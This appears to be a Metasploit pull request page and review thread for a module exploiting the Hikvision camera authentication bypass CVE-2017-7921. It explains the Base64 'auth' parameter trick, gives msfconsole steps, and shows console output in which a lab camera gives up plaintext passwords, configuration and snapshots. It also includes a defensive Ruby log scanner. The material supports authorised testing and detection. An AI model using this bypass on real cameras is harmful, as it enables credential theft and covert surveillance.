Hikvision camera unauthenticated information disclosure
Many Hikvision IP cameras have improper authorization logic that allows unauthenticated information disclosure of camera information, such as detailed hardware and software configuration, user credentials, and camera snapshots.
This module allows the attacker to disclose this information without the need of authentication by utilizing the improper authentication logic: it sends a request to the server which contains an `auth` parameter in the query string holding a Base64 encoded version of the authorization in `username:password` format. Vulnerable cameras will ignore the password part and will instead use the username part of this string as the user to log in. Using user `admin` will allow an attacker to retrieve and disclose any information of the targeted device.
The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
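As an added example that is not part of the module or this PR, the following Ruby snippet shows how a defender could spot requests of the shape described above in HTTP access logs in front of a camera: it looks for an `auth` query parameter that strictly Base64-decodes to `username:password` and reports only the username, since the password part is ignored by vulnerable firmware anyway. The log lines and request paths are constructed placeholders, not real camera endpoints.

```ruby
require 'base64'
require 'cgi'
require 'uri'

# Constructed sample access-log lines (Common Log Format); not from the page or a real device.
# Lines 1 and 2 carry an auth= query value that Base64-decodes to "user:password", the shape
# of a CVE-2017-7921 probe. The paths are placeholders, not real camera endpoints.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [02/Oct/2022:17:23:46 +0000] "GET /placeholder/config?auth=YWRtaW46MTE= HTTP/1.1" 200 4096
  10.0.0.5 - - [02/Oct/2022:17:23:47 +0000] "GET /placeholder/users?auth=YWRtaW46cGFzc3dvcmQ= HTTP/1.1" 200 512
  10.0.0.9 - - [02/Oct/2022:17:24:01 +0000] "GET /index.html HTTP/1.1" 200 1024
  10.0.0.9 - - [02/Oct/2022:17:24:05 +0000] "GET /placeholder/users?auth=notbase64!! HTTP/1.1" 401 0
LOG

REQUEST_RE = /"(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+"/

# Returns { user:, password: } when the request target carries an auth query parameter
# that strictly Base64-decodes to "user:password"; nil otherwise (no auth, bad Base64, no colon).
def decode_auth_param(target)
  query = URI.parse(target).query
  return nil if query.nil?
  value = CGI.parse(query)['auth']&.first
  return nil if value.nil?
  decoded = Base64.strict_decode64(value)
  user, sep, password = decoded.partition(':')
  return nil if user.empty? || sep.empty?
  { user: user, password: password }
rescue URI::InvalidURIError, ArgumentError
  nil
end

# Scans log text and returns one hit per matching request. Only the username is kept:
# the vulnerable firmware ignores the password part, and an alert should not copy secrets.
def scan_access_log(log_text)
  log_text.each_line.with_index(1).filter_map do |line, lineno|
    m = REQUEST_RE.match(line)
    next if m.nil?
    creds = decode_auth_param(m[:target])
    next if creds.nil?
    { line: lineno, src: line.split(' ', 2).first, path: URI.parse(m[:target]).path, user: creds[:user] }
  end
end

if $PROGRAM_NAME == __FILE__
  scan_access_log(SAMPLE_LOG).each do |h|
    puts "line #{h[:line]}: #{h[:src]} sent auth=<base64 user:password> for user '#{h[:user]}' to #{h[:path]}"
  end
end
```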
Verification
List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] `use auxiliary/gather/hikvision_info_disclosure_cve_2017_7921`
- [ ] `set RHOSTS <TARGET HOSTS>`
- [ ] `set RPORT <port>`
- [ ] `set PRINT true`
- [ ] `set ACTION Automatic`
- [ ] `run`
You should get a full disclosure of all camera information supported by this module.
Specific Hardware Examples: This module has been tested against a Hikvision camera with the specifications listed below:
- MANUFACTURER: Hikvision.China
- MODEL: DS-2CD2142FWD-IS
- FIRMWARE VERSION: V5.4.1
- FIRMWARE RELEASE: build 160525
- BOOT VERSION: V1.3.4
- BOOT RELEASE: 100316
Options
PRINT: this option allows you to print all information collected to the console during execution, except for camera snapshots.
Actions
Automatic
Retrieves all information supported by this module
Configuration
Retrieves the camera hardware and software configuration
Credentials
Retrieves all configured users including the passwords in plain text format and stores them in the database. This can be checked by using the command `creds -O <target IP>` at the Metasploit prompt.
Snapshot
Takes a camera snapshot and stores it as a JPEG file in loot.
All information disclosed is by default stored in loot.
Scenarios
Hikvision Camera DS-2CD2142FWD-IS -> firmware version V5.4.1, build 160525
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set ACTION Automatic
ACTION => Automatic
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set PRINT true
PRINT => true
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > options
Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
PRINT    true             no        Print output to console (not applicable for snapshot)
Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS   192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Met>
RPORT    80               yes       The target port (TCP)
SSL      false            no        Negotiate SSL/TLS for outgoing connections
VHOST                     no        HTTP server virtual host
Auxiliary action:
Name       Description
----       -----------
Automatic  Dump all information
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > check
[+] 192.168.100.180:80 - The target is vulnerable.
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > run
[*] Running module against 192.168.100.180
[*] Running in automatic mode
[*] Getting the user credentials...
[*] Credentials for user:admin are added to the database...
[*] Credentials for user:admln are added to the database...
[*] User Credentials Information:
-----------------------------
Username:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
Username:admln | ID:2 | Role:Operator | Password: asdf1234
[+] User credentials are successfully saved to /root/.msf4/loot/20221002172346_default_192.168.100.180_hikvision.creden_0492>
[*] Getting the camera hardware and software configuration...
[*] Camera Device Information:
--------------------------
Device name: IP CAMERA
Device ID: 88
Device description: IPCamera
Device manufacturer: Hikvision.China
Device model: DS-2CD2142FWD-IS
Device S/N: DS-2CD2142FWD-IS2016HS7777777777
Device MAC: bc:ad:28:ff:ff:ff
Device firware version: V5.4.1
Device firmware release: build 160525
Device boot version: V1.3.4
Device boot release: 100316
Device hardware version: 0x0
Camera Network Information:
---------------------------
IP interface: 1
IP version: v4
IP assignment: static
IP address: 192.168.100.180
IP subnet mask: 255.255.255.0
Default gateway: 192.168.100.1
Primary DNS: 8.8.8.8
Camera Storage Information:
---------------------------
Storage volume name: HDD1
Storage volume ID: 1
Storage volume description: DAS
Storage device: HDD
Storage type: internal
Storage capacity (MB): 30543
Storage device status: HD_NORMAL
[+] Camera configuration details are successfully saved to /root/.msf4/loot/20221002172347_default_192.168.100.180_hikvision>
[*] Taking a camera snapshot...
[+] Camera snapshot is successfully saved to /root/.msf4/loot/20221002172348_default_192.168.100.180_hikvision.image_963468.>
[*] Auxiliary module execution completed
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > creds -O 192.168.100.180
Credentials
===========
host             origin           service        public  private   realm  private_type  JtR Format
----             ------           -------        ------  -------   -----  ------------  ----------
192.168.100.180  192.168.100.180  80/tcp (http)  admln   asdf1234         Password
192.168.100.180  192.168.100.180  80/tcp (http)  admin   Pa$$W0rd         Password
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) >
Limitations
No limitations are identified so far using this module.
This looks really nice.
A recommendation on how to report the credentials via existing mixin support. Also based on the repeating comments I made I think this could be refactored to have helper methods that take a block or some other pattern to reduce the code that needs to be maintained a bit. (Note refactoring is not a requirement for landing, just something that may aid in maintenance down the line.)
Hi @jmartin-r7, Thanks for your comments and I accepted your suggestions for improvement. However I do see some errors now in the commits you suggested...
@h00die-gr3y, thanks for taking a look, the suggestions were not tested code just a way or providing examples diff inline on the PR. Please do test any changes you incorporate to validate them.
@jmartin-r7, Got it. I already incorporated all the changes suggested in the latest commit ae0f94b and tested it thoroughly. The code is good to go...
Thanks for updating this @h00die-gr3y! It looks good to me. I just left a couple of comments about a possible issue in validation logic before storing data in the loot. I missed those during my first review.
I believe there is no possible way to test this unless you own a vulnerable device. So, in order for us to validate this module works as expected, would you mind running the module with the option `HttpTrace` set to `true` and sending the console output as a comment in this PR? Don't forget to change/obfuscate any sensitive information in the output (IP addresses, credentials etc.). Also, please include the MSF database content by running db commands like `creds`, `hosts`, `services`, `loot`, etc. before and after the module has run. Note that, if the output is too big, you can send it to the Metasploit mailing list (msfdev [at] metasploit [.] com) with the corresponding reference (PR title and number). Thanks!
@cdelafuente-r7, I do have a vulnerable device that I use for testing. I can send you a network trace (pcap file) capturing the module run for you to inspect if all is working fine including the creds, loot, services and hosts output... Would that suffice?
@h00die-gr3y, sure, that is fine. The only thing is that obfuscating sensitive data in a PCAP might be challenging. If it is not a problem or if there is no sensitive data, the PCAP is fine. It can be sent to the Metasploit mailing list (msfdev [at] metasploit [.] com) with the corresponding reference (PR title and number). Thanks!
Hi @cdelafuente-r7,
I have run the module again and took a network trace with Wireshark. I have posted it as requested on the mail with the PR reference. Down here you can find the full run of the module at the msf console with the output of `loot` and `creds` as requested.
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > creds -O 192.168.100.2
Credentials
===========
host  origin  service  public  private  realm  private_type  JtR Format
----  ------  -------  ------  -------  -----  ------------  ----------
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > loot
Loot
====
host  service  type  name  content  info  path
----  -------  ----  ----  -------  ----  ----
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > options
Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
PRINT    true             no        Print output to console (not applicable for snapshot)
Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS   192.168.100.2    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT    80               yes       The target port (TCP)
SSL      false            no        Negotiate SSL/TLS for outgoing connections
VHOST                     no        HTTP server virtual host
Auxiliary action:
Name       Description
----       -----------
Automatic  Dump all information
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > exploit
[*] Running module against 192.168.100.2
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Running in automatic mode
[*] Getting the user credentials...
[*] Credentials for user:admin are added to the database...
[*] Credentials for user:admln are added to the database...
[*] User Credentials Information:
-----------------------------
User:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
User:admln | ID:2 | Role:Operator | Password: asdf1234
[+] User credentials are successfully saved to /root/.msf4/loot/20221019095549_default_192.168.100.2_hikvision.creden_931301.txt
[*] Getting the camera hardware and software configuration...
[*] Camera Device Information:
--------------------------
Device name: IP CAMERA
Device ID: 88
Device description: IPCamera
Device manufacturer: Hikvision.China
Device model: DS-2CD2142FWD-IS
Device S/N: DS-2CD2142FWD-IS201677777777777777777
Device MAC: bc:ad:28:ff:ff:ff
Device firware version: V5.4.1
Device firmware release: build 160525
Device boot version: V1.3.4
Device boot release: 100316
Device hardware version: 0x0
Camera Network Information:
---------------------------
IP interface: 1
IP version: v4
IP assignment: static
IP address: 192.168.100.2
IP subnet mask: 255.255.255.0
Default gateway: 192.168.100.1
Primary DNS: 8.8.8.8
Camera Storage Information:
---------------------------
Storage volume name: HDD1
Storage volume ID: 1
Storage volume description: DAS
Storage device: HDD
Storage type: internal
Storage capacity (MB): 30543
Storage device status: HD_NORMAL
[+] Camera configuration details are successfully saved to /root/.msf4/loot/20221019095550_default_192.168.100.2_hikvision.config_350877.txt
[*] Taking a camera snapshot...
[+] Camera snapshot is successfully saved to /root/.msf4/loot/20221019095551_default_192.168.100.2_hikvision.image_592929.bin
[*] Auxiliary module execution completed
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > loot
Loot
====
host           service  type                  name           content     info                  path
----           -------  ----                  ----           -------     ----                  ----
192.168.100.2           hikvision.credential  credentials    text/plain  leaked credentials    /root/.msf4/loot/20221019095549_default_192.168.100.2_hikvision.creden_931301.txt
192.168.100.2           hikvision.config      configuration  text/plain  camera configuration  /root/.msf4/loot/20221019095550_default_192.168.100.2_hikvision.config_350877.txt
192.168.100.2           hikvision.image       snapshot       jpeg/image  camera snapshot       /root/.msf4/loot/20221019095551_default_192.168.100.2_hikvision.image_592929.bin
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > creds -O 192.168.100.2
Credentials
===========
host           origin         service        public  private   realm  private_type  JtR Format
----           ------         -------        ------  -------   -----  ------------  ----------
192.168.100.2  192.168.100.2  80/tcp (http)  admln   asdf1234         Password
192.168.100.2  192.168.100.2  80/tcp (http)  admin   Pa$$W0rd         Password
I confirm we received the PCAP and I'll review it ASAP. Thank you!
Everything looks good to me. I'll go ahead and land it. Thanks again for your contribution.
Release Notes
This adds an auxiliary module that leverages an authentication bypass vulnerability in Hikvision IP cameras (CVE-2017-7921) to disclose information such as detailed hardware and software configuration, user credentials, and camera snapshots.